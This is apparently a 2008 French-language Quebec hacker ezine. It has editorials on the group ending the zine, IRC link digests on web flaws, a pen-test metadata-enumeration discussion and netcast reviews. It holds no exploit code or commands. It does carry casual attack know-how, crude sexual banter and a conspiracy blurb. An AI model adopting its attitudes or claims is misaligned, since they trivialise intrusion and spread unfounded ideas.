best viewed with firefox
visit www.mindkind.org for more stuff
topic

    
 .----------------------------.
 |                             \
 | .---------- --- ----. ,---   \
 | |                   | |   |   '--------------------- - ------------- - - ---.
 ' |                   ; '---'                                                 |
 | |                   . .---. .- -----. .-----.                               |
 . |             .     | |   | |       ; |      \                              |
 | :      .      '     | |   ; |       | |    \  ;                             '
 | |      |      |     | |   | |   /   | |    /  .                             :
 | |      |      |     | |   | |   |   | |      /                              |
 | '--- --'--- --'-----' '---' '---'---' '-----'                               |
 |                                                                             |
 |         .------------------------------------------------------------.      :
 |         | - case 01,  making lost hackers run in circle since 2007.  |      |
 '         '------------------------------------------------------------'      |
 |                                                                             |
 |                .---------.  .- --.                                          |
 |                ;        /  /     |                                          ;
 |                |       /  /      |                                          |
 |                .       \_/      /                                           |
 |                ;               /    .---.                                   .
 |                |              /     '---'                                   |
 '                |        _     \     .---. .-------. .-----.                 |
 |                |       | \     \    |   | |       | |      \                |
 |                |       |  \     \   |   | |       | |    \  ;               ;
 |                |       \   \     \  |   | |   /   | |    /  .               |
 |                |        \   \     | |   | |   |   | |      /                '
 |                '-- --- --'   '----' '---' '---'---' '-----' 1101            |
 |                        						       |
 '------ ----------------- --------------------- ---------------- - -----------'    
 

                  Mindkind  1101 - Le sensationel en ASCII


                         /\/\ | |\| |> |< | |\| |>
                           ------------------------
                            the packet size ezine 
                           ------------------------



Issue 1101, by the ending of Febuary 2K8 almost middle of April 2K8
somewhere on the Intertubes.

Salutations singes intellectuels  à pelage en  fibre optique. C'est  après
des vacances bien mérités que l'équipe du eZine (so called team  Mindkind)
se remet à la tâche de vous pondre un autre magasine binaire. 

Le sensationnalisme est à l'heure, et Mindkind en fait pas exception. Avec
le  brassement relié  à phrack  dans les  derniers ezines,  la population
lémurienne s'est excité plus que  jamais. Meanwhile, on s'est aussi  rendu
compte que y'a ben  du monde qui connaissaient  pas phrack avant qu'on  en
parle. Fait étonnant car on pensait que c'était la bible des ezines,  mais
ça dlair  qu'a chacun  sa religion.  Faut dire  qu'on accepte la diversité
dans Mindkind.. mais bon  on va pas se  lancer dans ce sujet,  mais disons
que  l'accommodement  raisonnable se  résume  à du  typecasting  en C++  :
(maReligion) Dieu;

On continue encore avec les nouvelles contribs, et ce coup la on vous fait
pu réellement le coup des 300ko parce qui faut remplir.. d'ailleurs un bon
pourcentage de la team Mindkind (et  même ceux qui savent pas qui  en font
parti)  se concentre  plus sur  des projets,  qui refléterons  un jour  ou
l'autre dans le eZine. Meanwhile si vous voulez encore plus d'informations
à plus  en finir,  nous vous  conseillons le  site suivant  comme départ :
www.google.com

Évidemment on peut pas s'empêcher de mettre des efforts pour baisser notre
niveau d'anxiété et votre niveau d'intérêt, et pour ce faire, voici  notre
disclameur :


                                 DISCLAIMER

MindKind vous rappelle que...

lire en marchant
peut causer des accident avec des éléments du décors plus ou moins appréciable

lire en mangeant
peut causer des étouffement avec des aliments du décors plus ou moins appréciable

lire en baisant
peut causer des frustration avec des habitants du décors plus ou moins appréciable

lire en lisant 
peut causer des problèmes de récursivité avec les textes du décors plus ou moins appréciable


 




.------------- - -------------------------------------------------- ----------. | | ; .--Oh where oh where can my ezine be, the lord took him away from me--. | | | | | '---' '---' .---. .------------- ---------------------------------------------------------. | | | Patrimoine | | '-' | | Patrimoine Lémurien | | .-. Patrimoine Bonus ' | | | | '---' '------------------------------------------- ---------------------------' .---. '---' .---. .------------- ---------------------------------------------------------. | | | Chronique from other source | | | | | | | | Internet selection digest | | '-' . | Netcasts : La radio en paquets | | Les écrits de c4ndu | | .-. | '---' '------------------------------------------- ---------------------------' .---. '---' .---. .------------- ---------------------------------------------------------. | | | ONE HIT PAPERS !!!! | | '-' Owning cheap I.S.P in Quebec | | | | Owning some funky webhoster | | .-. | | | | | | | | | '---' '------------------------------------------- ---------------------------' .---. '---' NOW WE HAVE A BLOG !!!!! read it!
-- .. -. -.. -.- .. -. -.. CONTRIBUTE YOU FOOLS -- .. -. -.. -.- .. -. -.. Zarticles! On cherche des zarticles pour One hit papers.. comme vous avez pu le constater, les éditeurs passent le majeur de leur temps sur les chroniques les projets et les videos funny sur youtube, donc la tâche va revenir aux auteurs externes de fournir des papiers. La bonne nouvelle, c'est que si votre article ne passe pas les critères de "qualités" (oui, ce coup la Mindkind sépare la crap du real stuff) vous allez être quand même publié (oui, ce coup la Mindkind avoue publier dla crap!).. mais dans la section papers that didn't make it qui est pas directement dans le "core ezine". Au cas où vous avez pas remarqué, le ezine présent contient peu de technique, mais on est grandement ouvert à ça, sauf que pour faire un OHP il faut quelque chose avec un minimum d'originalité dans le sens d'inédit. Sendez donc vos zarticle à wyzeman@mindkind.org Ah pis si ça vous tente de taker over une chronique, on est bien ouvert à vos contributions, si vous payer l'VSOP. -- NEW -- Pour ceux qui veulent écrire en anglais, shooter nous ça on va refiler vos articles à phrack... =) -- UPDATE -- Les articles pourront servir au futur wiki/blog.. donc continuer d'envoyer des trucs à la tonne (ehh right). ____ ___ ______ ___ ________ / \ | .------. .------. | | / \ / \ | | | _ | | _ | | | \ ( ) / \ ( ) / | | '------' . . '------' | [d] .' '. [p] | p q | .----------------------------------------. | | | ; | _____________ _ _____ | _|__ __ _ _________ _ _ __|_ |_ __) __________ _ ___ (____| |__ __) (_ __ | |__ __) (___ _| |_ __) ____ ___ ____ __ ___ (__ _| | ____ _ __ _______ __ | | ________ ______ _ __ | | _______________ ___ | | . | | | | '------------ ---. .--- -- ---------' | | . ; _____ ___ _ __ __ ___ Mindkind : la seule bonne raison de vous achetez un flatscreen. .---. ,---. .-----, .---. | | | | | | | | .--------| |--| |--| . |--| |------------ - -- - - - - - - - - - ------. | | | | | | | | | /Patrimoine | '--------'---'--'---'--'-----'--'---'------------------------------- ----------' | __ _ __ __ _ __ | | __ _ _____ | | Le patrimoine lémurien __ _ | | __ _ _ __ aka | | __ _ __ _ Wyzeman avait raison | | | '--[par LastCall_]-------------------------------------------------------------' Wyzeman avait raison. Eh non ce patrimoine ne sera pas un hommage à Wyzeman, mais bien la suite de nos belles histoires des pays d'en bas (so called undergrounne). Pour bien comprendre là où Mindkind est, il faut comprendre pourquoi Wyzeman avait raison. Quelque part entre 2004 et 2006, lors d'une des maintes réformes du groupe, Wyzeman proposa un plan de commercialisation de Mindkind. Autrement dit, de passer de l'undergrounne pure et simple, qui rapporte rien en soit, à un concept plus lucratif qui incorpore les ressources undergrounne du groupe. De ce début d'idée, naquit MMM et MazNetwork. MMM étant l'entité la plus top level: Mindkind Money Machine. MazNetwork, un team composer de MindFlayR, h3, TheCops et LastCall_ (pis Wyzeman sul conseil). C'était pour marcher, car on basait le premier projet de MazNetwork sur du porn, et le porn ça paye et ça payera toujours. Bref, c'était parti pour rouler, mais MindFlayR a roulé dans le fossé (fait véridique) et le projet, manquant son investigateur à prit le champ lui avec. Le projet fût donc laisser de coté, mais le reste de Mindkind (ezines, projects) continuait de rouler. Le plan de Wyzeman était simple: arriver à faire en sorte que Mindkind devienne une entreprise avec roulement. Malheureusement, plusieurs personnes (et même du monde parmit ceux de MazNetwork) ne croyaient pas au mélange "undergrounne et corpo". Wyzeman, lui, avait d'l'air de savoir où il s'en allait, mais personne avait réellement envie de se baser sur le trip de balounes de sfaire du fun online que Midnkind providait d'abord et avant tout. Pourquoi Wyzeman avait si raison alors? Eh bien c'est simple. Les gens ont besoin d'argent pour vivre, et donc, les efforts de ceux-ci se font dans des projets qui rapporte. Travailler pour un employeur "overground" (régulier) est l'option logique. Même pour ceux qui sont à leurs compte, travailler pour des clients "overground" est encore l'option à suivre. Alors bref, les gens finirent par se pogner des jobs dans leurs domaine.. en utilisant en partie l'expérience acquise dans "l'undergrounne". Mindkind ne devint plus une priorité. "$$ avant mkd" Qu'on a un jour dit... Wyzemant avait raison, car pour que Mindkind continue sa course folle de grandir, il fallait que mkd == $$ et malheureusement, on a pas embarquer. La conséquence directe est qu'on a tous maintenant d'autres chats à fouetter (incluant Wyze btw) et qu'on ne voit plus viable la solution d'investir du temps dans Mindkind pour en retirer les profits plus tard. Donc, avoir écouter Wyzeman, on serait probablement toute riche avec des BMW et un condo en floride, d'autant plus qu'on aurait plein d'accès gratuits à des sites de culs (le paradis hein?). Il faut que je fasse l'exercice de comprendre la choses suivante : C'est pas parce qu'une vision est effectivement bonne, qu'après le temps elle est prouvée bonne par l'échec de pas la suivre, que c'est cette vision qui va être suivit. Pourquoi? Certain vont dire que c'est parce qu'on a voter conservateur (la faute a Mario Dumont again), ou parce que Wyzeman est pas foutu de rien faire de plus que d'avoir des idées, mais je dirais plus que c'est parce que les gens ont ben de la difficulté à partager les rêves des autres, quand eux autres pensent qu'ils doivent choisir un chemin tracé dans la conformité. Sur ce, Mindkind n'est pas fini. Mais le ezine si. On va continuer de faire du stock, avec un blog et un wiki, mais on va du même coup faire un renice + 20 MKD_PID. Mindkind ne va pas devenir corpo, Mindkind va rester ce qu'il était, undergrounne. Mindkind ne sera pas blanc, ne vivra pas noir, va rester damier. Mindkind va continuer de déranger, mais ne récoltera pas de TPS/TVQ sur ses ventes. -- NOW -- Sorti des branches du néant, low_rent fait parti des prometteurs de la nouvelle génération. J'y croyais pas à la relève. Je pensais que tout le monde était devenu des consultants bien habillé, pis que les IRC wars avaient découragé ce qui restait de motivation. Mais ça dlair de non. low_rent à un article dans ce moi ci, et (on l'espère, well ben yé supposé) contribuera aux prochains trucs. Il semme la contreverse, il se croit pas white ni black (pas raciste? haha), il sait haxorisé, il déteste l'establishment, bref, on dirait un lémurien que Wyze à bio-engineeré pour embarquer dans la crew. Sur ce, on arrête officiellement les releases "Wyze & Last" du ezine, et on se concentre sur autre choses (nos projets). Je tire enfin ma révérence à la tentative d'implication continue, et vous laisse place au spectacle de la nouveauté. have phun. ACK/FIN. - LastCall_ .---. .---. | '---------------------------------------------------------- - ---------' | | | '------------------------------------------------------------------------------' | .---. .---. .-----, .---. | | | | | | | . | | | | '-----------------------------------------------'---'-'---'-'-----'-'---'------' .---. ,---. .-----, .---. | | | | | | | | .--------| |--| |--| . |--| |------------ - -- - - - - - - - - - ------. | | | | | | | | | /Patrimoine | '--------'---'--'---'--'-----'--'---'------------------------------- ----------' | __ _ __ __ _ __ | | __ _ _____ | | Le patrimoine bonus __ _ | | __ _ _ __ aka | | __ _ __ _ wyze a perdu son Internet dans le void | | | '--[par LastCall_]-------------------------------------------------------------' Bon, vu qu'on a releasé ce ezine très en retard (genre 3 mois..), il y a un event considérablement considérable (répétition voulu) qui c'est produit au Québec : Le rectum crew c'est faite busté. Pour ceux qui s'en rapellent, c'est la gang qui c'est fait buster par la SQ en fin février. On avait donc prévu vous monter un dossier, car évidamment on est au courant de "l'undergrounne" pis on les connaissait. Fak vous allez devoir nous croire sur parole, c'est vraiment le rectum crew, la gang qui floodait sur IRC. En faite, c'est plus le rectum crew 2.0 ou 3.0, entk une suite ou des gens très relié. Évidamment Mindkind est pas dans ce genre de business (on fesait des ezines.. pas du script kidding), mais si vous avez lu les anciens ezines, et que vous êtes du genre à être lémurien, vous comprennez c'est quoi des "zombies" et pourquoi y'a des chans avec 5 000 bots sur IRC. J'avais quand même monter un dossier de presse, que je vais inclure à l'adresse suivante : http://www.mindkind.org/busted/ Y'a des vidéos, des pdf et un peu d'audio. Rapellez-vous de ce event comme le plus gros au Québec à date (au canada?), pis que nos disclaim ont beau être humoristique, ben ça leur aurait servit à pas faire de conneries. PS: chercher pas la chronique à Wyze, y'en a pas, ou c'est ça : [20:31] lastcall_> ecrit moi un text [20:31] lastcall_> pour le patrimoine [20:31] lastcall_> qui dit que c fini [20:31] lastcall_> men fou si c 3 lignes [20:31] Wyzeman> "c'est fini" [20:31] Wyzeman> tien [20:31] Wyzeman> c faite .---. .---. | '---------------------------------------------------------- - ---------' | | | '------------------------------------------------------------------------------' | .---. .---. .-----, .---. | | | | | | | . | | | | '-----------------------------------------------'---'-'---'-'-----'-'---'------' .---. ,---. .-----, .---. | | | | | | | | .--------| |--| |--| . |--| |------------ - -- - - - - - - - - - ------. | | | | | | | | | /Chronique | '--------'---'--'---'--'-----'--'---'------------------------------- ----------' | __ _ __ __ _ __ | | __ _ _____ | | Internet selection digest __ _ | | __ _ _ __ aka | | __ _ __ _ fusion de chroniques paske chu lazy | | | '--[par LastCall_]-------------------------------------------------------------' LIVE HUMAN PARSER WANTE.... NOT!
2008-01-15 rnd(IRC) [02:28] <LastCall_> ya tu qqn qui va chialer [02:29] <LastCall_> si jenleve ma revue des blogues? [02:47] <vn-> pense pas [02:53] <vn-> quoique...dis toi na tjs qui trouvent le moyen de chialer :p [02:54] <LastCall_> jmattendais a un pas de réponses...
MKD SAYS: i guess not last! so aweille entertain nous avec tes URLs la.
07 Jan 2008 Idée terrible (RAID+encryption+backup)

Lugalle

Je viens d’avoir une «idée terrible» (comme dirait Gotlib). De plus en plus, on entend parler de vol de données et tutti-quanti. Une solution s’impose de file, l’encryption de disque (moi, je me sers de «Truecrypt»). Mais un problème se pose avec la sauvegarde de données. Le média le plus répandu et le moins cher est maintenant le DVD. Mais à 4.7 gigs, on en a vite fait le tour… Jadis, dans une vie précédente, lors de l’arrivée de cartouches Syquest de 80 megabytes, j’ai divisé le disque de mon système en partitions de 80 megabytes, histoire de pouvoir faire facilement des backups sans devoir jongler avec les fichiers. Je pensais donc faire la même chose avec des volumes de 4.5 gigs qui seraient backés sur DVD, mais avec une touiste: encrypter les volumes avec TrueCrypt ET faire un RAID-0 (stripé sans parité) avec. Oui, bien sûr, ce sera plus lent pour l’accès (si j’ai besoin de vitesse, je copie ce qu’il faut sur ma station et le remet sur le serveur quand j’ai fini). Pour ce qui est des backups, on n’a qu’à brûler chacun des volumes sur un DVD et le tour est joué. (Évidemment, si ne peut pas ne pas accéder aux données lors du backup, on miroire le tout sur un autre disque, duquel on brûlera les backups). Vos commentaires/observations/suggestions?)

Drizzt

C'est une bonne solution à un problème qui n'existe pas Clin d'oeil Mort de rire Solution proposée, faire un tarball de tes données et le passer dans split pour créer des fichiers de 4.3/4.4GB. Si jamais tes données dépassent l'espace que tu avais réservé via tes partitions, c'est seulement que d'ajouter un nouveau DVD à graver.
MKD SAYS: bon vous comprennez pourquoi je me suis tanné de parser ça? y'en a qui ont trop de temps à job jpense.. Drizzt aurait quand même pu penser à l'ENCRYPTION dans sa solution. Mais bon, l'encryption tlm sait que ça sert juste à te donner une autre méthode pour perdre tes données en perdant ta clé...
2007-12-04 Passport applicant finds massive privacy breach

KENYON WALLACE

From Tuesday's Globe and Mail A security flaw in Passport Canada's website has allowed easy access to the personal information - including social insurance numbers, dates of birth and driver's licence numbers - of people applying for new passports. The breach was discovered last week by an Ontario man completing his own passport application. He found he could easily view the applications of others by altering one character in the Internet address displayed by his Web browser.
MKD SAYS: bon de quoi d'intéressent from les mass medias.. quoi de plus la dessus?
from bugtraq: WHID 2007-62: A security flaw in Passport Canada's website ========================================================== Reported: 19 December 2007, Occurred: 01 December 2007 Classifications: * Attack Method: Credential/Session Prediction * Country: Canada * Outcome: Disclosure Only * Vertical: Government The Web site of the Canadian passports authority enables users to access others' record by modifying a value of a parameter in the URI. ...
2008-01-15 rnd(IRC) [23:58] <phawnky> heh [23:58] <phawnky> http://www.ihateyoujulia.com/?id=25b0477bb68df654b78495ed28b01b7f [23:58] <LastCall_> taime le vid phawnky [23:58] <LastCall_> haha [23:59] <phawnky> haha [23:59] <phawnky> pas encore checker [23:59] <LastCall_> hahah [23:59] <LastCall_> jm le concept du gars [00:00] <Qwzykx> ouais sa l'attire des naifs en quete de sensation ;) [00:00] <phawnky> ;) [00:01] <LastCall_> le truc du genre qui ma faite le plus rire [00:01] <LastCall_> c un robot qui register sur des site web [00:01] <LastCall_> avec des capchats [00:01] <LastCall_> le robot roule sur un site web qui donne du porn a du monde qui solve des capchats.. [00:01] <LastCall_> hahaha [00:02] <LastCall_> fak yon pas besoin de coder un reader de capchat hot, yon juste besoin davoir des pervs qui veulent leur porn et qui solve les capchats pour le bot.. hehehe [00:02] <phawnky> rofl [00:07] <LastCall_> http://www.ihateyoujulia.com/?id=57bb2b70bf887747258a0cd8393384c0 [00:07] <LastCall_> phawnky si tu click sul mien ca me fait tu un click? [00:09] <phawnky> le gars va tellement se faire du cash [00:09] <phawnky> haha [00:13] <securfrog> "She was really pretty" wtf ... [00:16] <securfrog> hum spa l'air d'etre la meme .. logo.jpg [00:17] <LastCall_> serieux me fou un peu dla chix aux faux seins [00:17] <LastCall_> haha [00:17] <LastCall_> mais le concept est bon [00:18] <securfrog> jme demande juste si c'est vrai sont affaire , y a 2 julia :) [00:18] <securfrog> http://64.233.169.104/search?q=cache:U4g[...] [00:19] <Qwzykx> le site a quand meme poper de 100 user en moins de 20 min.. [00:19] <LastCall_> hahaha [00:19] <LastCall_> surement pas :-) [00:19] <securfrog> :) [00:19] <Qwzykx> y etait a 2XX quand j'suis aller tento.. pis la ye a 3XX [00:19] <LastCall_> fak le gars [00:19] <LastCall_> doit se faire du cash [00:19] <LastCall_> clever [00:19] <LastCall_> paske anyways [00:19] <LastCall_> un gars qui pense a ce genre de truc [00:19] <Qwzykx> qui etait pas de moi [00:19] <LastCall_> ne se pogne pas une chxi de meme [00:19] <LastCall_> hahaha [00:20] <phawnky> hahaha [00:20] <LastCall_> .. encore mois dun club [00:20] <LastCall_> haha [00:20] <securfrog> :) [00:20] <LastCall_> si mettons yaurait dit sur irc [00:20] <LastCall_> hehe [00:23] <ShdwKnght> moi jveux voir elle [00:23] <ShdwKnght> http://64.233.169.104/search?q=cache:U4gYk[...] [00:23] <ShdwKnght> nue [00:23] <ShdwKnght> elle est adorable [00:23] * ShdwKnght drools..
MKD SAYS: i guess not last! so aweille entertain nous avec tes URLs la.
2008-01-08 rnd(IRC) [14:11] <vn> http://www.canoe.com/techno/[..]01/20080102-114652.html Wal-Mart a vendu un lecteur MP3 neuf contenant de la porno Un résident de Cookeville, au Tennessee, envisage de poursuivre Wal-Mart parce que le lecteur MP3 vidéo acheté pour Noël à sa toute jeune fille s’est avéré rempli de musique sexuellement explicite et de vidéos pornos. Selon Daryl Hill, sa fille de 10 ans a éclaté en sanglots à la vue de ce contenu douteux. Le père éploré aimerait bien retirer ces idées et ces images des souvenirs de son enfant.
MKD SAYS:10$ c le père qui a mit le porn dessus pis y fait ça pour pas sfaire pogner.
2008-01-08 rnd(IRC) Arab Drift [19:33] darkis> http://www.youtube.com/watch?v=Coj2wfPouuk [19:33] ShdwKnght> HAHAHAHAHAHHAHAHAHA [19:33] ShdwKnght> omg darkis`
2008-01 rnd(IRC) [22:20] nexact> www.gnucitizen.org all-your-metadata-are-belong-to-us All your Metadata are belong to Us published: January 4th, 2008 Every penetration test consists of 90% enumeration and discovery exercises and 10% of actual exploitation. Of course, these are the figures unless you are performing a vulnerability research where the situation is very different. I tend to believe that enumeration is essential if not critical for hacking into whatever system you may have in mind. Though, I’ve seen many testers who rush into the exploitation stage, which is not necessarily a bad thing, but given the fact that there are always better things to do instead of firing metasploit and bombarding the targeted system with crap, it is largely unnecessary. [...] Infocrobes and Bashitsu both consists of command line scripts that can be used as filters and extractors. [...] Another tool which I find very useful is called libExtractor. Libextractor is a library used to extract meta-data from files of arbitrary type. It is designed to use helper-libraries to perform the actual extraction, and to be trivially extendable by linking against external extractors for additional file types. So we are moving up the food chain of metadata tools. The most GUI like, without no doubt, is Maltego. Maltego has loads of features that help the enumeration process quite a lot. It also has a powerful metadata extraction tool. There are also mechanisms to write your own trasnformers in python and any other language if you dare to code Maltego’s protocol yourself. I will come back with some further developments for this tool in particular since I am busy with some very interesting stuff at the moment. [...] Sid responds: You might also want to check hachoir toolkit at http://hachoir.org/ and in particular hachoir-metadata, dedicated to metadata extraction. [...] BECN responds: exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ is a fantastic metadata discovery & altering perl based package that’s also worth checking out [...] [22:25] <nexact> jpense que jvais ajouter ca sur mon google search en python [22:26] <nexact> une feature pour extraire les differents flag des .doc [22:26] <phawnky> yeah c'est neat [22:26] <nexact> http://gnunet.org/libextractor/demo.php3?xlang=English [22:26] <phawnky> ca peut te donner des indices sur le format de leur usernames [22:27] <nexact> .doc ca fonctionne bien [22:27] <nexact> word trace pas mal [22:28] <phawnky> pas grand shit pour un .ppt [22:28] <phawnky> j'ai le nom du creator, et that's it [22:28] <phawnky> tk dans celui la [22:28] <nexact> ok [22:28] <nexact> pdf y'as rien [22:29] <nexact> ca depend de l'editeur [22:31] <nexact> y'as pas reellement de username
MKD SAYS: wow enfin de quoi de technique! knowledge is power.
2008-01 rnd(IRC) [22:31] <phawnky> y'a d'autre site que tu frequente pour avoir des strats de pen testing? [22:31] <nexact-> c'pas mal y'ink le creator [22:31] <phawnky> securityfocus est boring [22:31] <nexact-> bah, j'ai pas mal de feed rss [22:31] <nexact-> minute [22:34] <nexact-> www.ha.ckers.org [22:34] <nexact-> http://avi-rubin.blogspot.com/ [22:34] <nexact-> http://www.cert.org/podcast/ [22:34] <nexact-> http://shiflett.org/ [22:35] <phawnky> ty [22:35] <nexact-> http://www.lightbluetouchpaper.org/ [22:35] <nexact-> etc [22:35] <nexact-> cherche security blogs sur google [22:36] <nexact-> add tt sur tes rss [22:36] <nexact-> c'est pas pire :)
MKD SAYS: well heureusement qu'on a nexact pis phawnky pour la teknik.. en passant les blogs "secu consultant" c pas mal white (le plus entre les 2 c'est gary mcgraw http://www.cigital.com/justiceleague/author/gem/ ou encore http://taosecurity.blogspot.com/).. y'a tu des blogs plus dark? http://erratasec.blogspot.com/ ... ah c vrai, les vrai font des zines, haha.
2008-01-15 rnd(IRC) [00:24] <_mulder>
MKD SAYS: yé temps qu'on utilise HTML un peu...
2008-01 rnd(IRC) [13:34] <phawnky> http://www.whitney.org/[..]/Paley/CodeProfiles_800x600.htm [13:34] <phawnky> heh
MKD SAYS: woa on voit la matrice!
2008-01-15 rnd(IRC) [18:31] <Stirb> www.wired.com/[..]/2008/01/dreamliner_security FAA: Boeing's New 787 May Be Vulnerable to Hacker Attack Boeing's new 787 Dreamliner passenger jet may have a serious security vulnerability in its onboard computer networks that could allow passengers to access the plane's control systems, according to the U.S. Federal Aviation Administration. The computer network in the Dreamliner's passenger compartment, designed to give passengers in-flight internet access, is connected to the plane's control, navigation and communication systems, an FAA report reveals. The revelation is causing concern in security circles because the physical connection of the networks makes the plane's control systems vulnerable to hackers. A more secure design would physically separate the two computer networks. Boeing said it's aware of the issue and has designed a solution it will test shortly. "This is serious," said Mark Loveless, a network security analyst with Autonomic Networks, a company in stealth mode, who presented a conference talk last year on Hacking the Friendly Skies (PowerPoint). "This isn’t a desktop computer. It's controlling the systems that are keeping people from plunging to their deaths. So I hope they are really thinking about how to get this right." [...] Gunter added that although data can pass between the networks, "there are protections in place" to ensure that the passenger internet service doesn't access the maintenance data or the navigation system "under any circumstance." She said the safeguards protect the critical networks from unauthorized access, but the company still needs to conduct lab and in-flight testing to ensure that they work. This will occur in March when the first Dreamliner is ready for a test flight. Gunter said Boeing has been working on the issue with the FAA for a number of years already and was aware that the agency was planning to publish a "special conditions" document regarding the Dreamliner.
MKD SAYS: hacks on a plane! Faut pas mélanger Gunter et Gunther
2008-01 rnd(IRC) [14:28] <ShdwKnght> http://break.com/index/the-proposal.html [14:31] <Ysis> hahaha [14:34] <c4-> hah [14:35] <_mulder> mouahaha [14:35] <ShdwKnght> wow nice http://break.com/index/jason-bourne-roommate-conflict-resolution.html [14:38] <netlord> les essuis-tout!!1 [14:38] <netlord> chef d'oeuvre! [14:38] <ShdwKnght> hahaha [14:39] <phawnky> rofl [14:39] <_mulder> trop fort [14:40] <_mulder> avec la tune de moby a fin [14:40] <ShdwKnght> jecoutais un film avec des scenes d'action comme ca [14:40] <ShdwKnght> *ecouterais [14:40] <ShdwKnght> lol bonus: [12:00] <Patoff> www.break.com/index/top-10-internet-videos-of-2007.html le #9 est fort
MKD SAYS:and now.. un petit 'break' (jeu de mots ici)
2008-01 rnd(IRC) [15:45] <_mulder> www.schneier.com/[..]/dual_ec_drbg_ad.html December 17, 2007 Dual_EC_DRBG Added to Windows Vista Microsoft has added the random-number generator Dual_EC-DRBG to Windows Vista, as part of SP1. Yes, this is the same RNG that could have an NSA backdoor. It's not enabled by default, and my advice is to never enable it. Ever. EDITED TO ADD (12/18): I should make this clear that the algorithm is available as a program call. It is not something that the user can enable or disable.
MKD SAYS: microsoft fou des backdoors pour gov? nahh??? tant qua faire google coopère ak le gouv too.. oh wait.
2008-01 rnd(IRC) [16:05] <LastCall_> http://www.misternicehands.com/
MKD SAYS: last et sa tentative d'être dans le beat de la majorité (unnoticed as usual)
.---. .---. | '---------------------------------------------------------- - ---------' | | | '------------------------------------------------------------------------------' | .---. .---. .-----, .---. | | | | | | | . | | | | '-----------------------------------------------'---'-'---'-'-----'-'---'------' .---. ,---. .-----, .---. | | | | | | | | .--------| |--| |--| . |--| |------------ - -- - - - - - - - - - ------. | | | | | | | | | /Chronique | '--------'---'--'---'--'-----'--'---'------------------------------- ----------' | __ _ __ __ _ __ | | __ _ _____ | | Netcasts __ _ | | __ _ _ __ aka | | __ _ __ _ La radio en paquets | | | '--[par Botrax]----------------------------------------------------------------' Mindkind presents : La radio en paquets Dans cette chronique vous allez retrouver une revue de différents netcasts francophones. Évidamment le contenu va être du "talk only" (ou talk mostly) car vous savez tous que ya technobase.fm pour du mind numbing techno. Pour ceux qui veulent se faire connaitre, hésiter pas à nous envoyer un mail. lastcall@mindkind.org pour l'instant Le BotCast with Cheese http://www.BotCast.net Sujets: politique, société et crosses en tout genre. Animé par Botrax et TestDummy, ils vous présentent leurs commentaires sur les crosses globales sur un fond de musique du "Demo Scene" en MP3Surround.
BotCast #26 - Philippines Sundance.  
Botrax nous transporte aux Philippines!!!!! 
Découvre avec Botrax certaines coutumes et façons de faire de ce peuple tropical. 
Découvre son massage par un tueur à gages, 
les combats de coqs et les sons du nouvel an!
www.mp3surround.com ou www.Winamp.com version 5.5 pour écouter en surround.
(19 janvier 2008)
GALLERIE PHOTOS http://www.botcast.net/tiki-browse_gallery.php?galleryId=1

http://www.botcast.net/shows/2008/BotCast-0026-MP3Surround.mp3
TiteBot #4    Il existe un plan des élites pour réduire la population.
(8 décembre 2007)
http://www.botcast.net/shows/TitesBots/2007/TiteBot-0004.mp3


Craque Mental
www.CraqueMental.com
Sujets: Commentaires  sociaux qui  dénoncent la  désinformation. Faut être
craqué mental pour foncer dans la désinfo.
L'émission de radio  internet Craqué Mental  se veut être  un endroit pour
discuter  de  n'importe quoi.  Le  monde internet,  quoi  que l'on  puisse
croire, rapproche les gens et les cultures.

Bonjour, je m'apelle Jonathan Bouchard et je suis le créateur/animateur de
Craqué Mental. J'évolue où le destin veut bien me guider... J'en suis donc
présentement à  continuer mon  expérience en  radio internet,  après avoir
créé  QuitterLeQuébec,  TacticalFM.com  en   passant  par  mon  saut   sur
RocKIK.com  en  2005,  et  maintenant  en  animant  mon  propre  show  sur
RadioSHOCKLive.

Mon   but?   Parler   avec  vous.   Faire   ressortir   vos  opinions   et
l'information...  Prendre le  poulx de  la planète.  Voilà ce  que j'aime
faire.

Soyez la tout les vendredi, heure du Québec GMT-5, à 10H pour un saut dans
un monde totalement Craqué Mental!
Craqué Mental - 15 pouces
15 pouces, un podcast  des plus craqué mental.  Premier de 2008, on  parle
d'une femme assassinée il n'y a pas longtemps pour ce qu'elle aurait dit à
propos de Ben Laden  dans une interview à  la BBC... Bref.. vous  voyez le
topo...  N'oubliez  pas  de   donner  votre  présence  dans   les  shouts!
www.craquemental.com
http://www.tacticalfm.com/[..]/CraqueMental_15_17012008.mp3
Craqué Mental - 14 carats
Un Spécial premier anniversaire  TacticalFM.com! On dévoile des  stats, on
fait le tours  des podcasters.... Up  peu relaxe en  ce temps des  fêtes..
mais..  que  voulez-vous!  
N'oubliez  pas  de  visiter  www.craquemental.com pour lire  les
shouts associés à ce  show et aussi pour  donner votre présence! :D  
Bonne écoute
http://www.tacticalfm.com/[..]/CraqueMental_14_28122007.mp3

Radio Shock

http://www.radioshocklive.com/
http://radioshock.podomatic.com/rss2.xml
L'émission Radio SHOCK a pour but de divertir son auditoire tout en  ayant
comme  objectif de  faire découvrir  des courants  de pensées  différents,
Radio SHOCK c'est  le choc des  idées et de  la pensée sur  le web et  sur
Radio Parallèle XM 172.  Diffusion sur le web  tous les mercredis 20h,  et
22h sur XM 172.
http://radioshock.podomatic.com/enclosure/2008-01-18T05_50_33-08_00.mp3
Les Podcasts DANS TA FACE !
http://francistremblay.com/
Il s’agit d’un show unique et coloré, d’une durée d’environ une heure et demie et qui rassemble 4 jeunes célibataires de la région métropolitaine.  Quatre animateurs bien distincts dans leur style, leur image, leur philosophie et leurs actions. Le DTF est une émission qui traite de sujets qui sauront assurément ravir l’intérêt et la curiosité des 21 à 35 ans!!

Fort d’une équipe dynamique et explosive, ce concept savoureux saura vous captiver semaine après semaine!  Crue, tranchante, libre et engagée, cette spécialité locale s’appréciera mieux à froid!!

Invités spéciaux, capsules, humour, chroniques et interviews, talk-shit (talk-show!), remotes / événements spéciaux, etc. Tout est là pour vous garantir une heure et demie de fou-rires!!!
http://www.archive.org/download/ DansTaFaceDu14Janvier2008.mp3
http://www.archive.org/download/ donfranck.mp3
 

 
radio31337
http://radio31337.mindkind.org/
Sujets: pèter dla marde, funny, n'importe quoi, des fois de l'informatique
et du hacking
Animé mostly par init_null et LastCall_
Contient des archives de show de PQTD et autres shows.

Pendant que tu dormais (PQTD)
http://PQTD.TacticalFM.com
Sujets: hacking, technologie en generale, politique face a la technologie
Animé par Aprizm

KraKeN's Parad!se Radio  	
http://KPR.TacticalFM.com
Sujets: Nouvelles sur le peer-to-peer et autre côtés plus geeks de l'informatique.
Animé par Kraken

